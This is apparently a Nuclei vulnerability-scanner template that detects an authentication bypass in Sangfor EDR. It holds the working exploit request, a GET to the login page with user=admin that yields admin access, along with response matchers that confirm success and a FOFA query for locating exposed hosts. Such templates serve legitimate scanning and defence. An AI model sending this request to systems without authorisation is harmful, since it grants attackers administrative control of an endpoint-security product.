40 lines
916 B
YAML
40 lines
916 B
YAML
id: sangfor-edr-auth-bypass
|
|
|
|
info:
|
|
name: Sangfor EDR Authentication Bypass
|
|
author: princechaddha
|
|
severity: high
|
|
description: |
|
|
A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login
|
|
screen without providing a username.
|
|
metadata:
|
|
fofa-query: app="sangfor"
|
|
tags: sangfor,auth-bypass,login
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/ui/login.php?user=admin"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "/download/edr_installer_"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'Set-Cookie=""'
|
|
negative: true
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'Set-Cookie='
|
|
|
|
- type: status
|
|
status:
|
|
- 302
|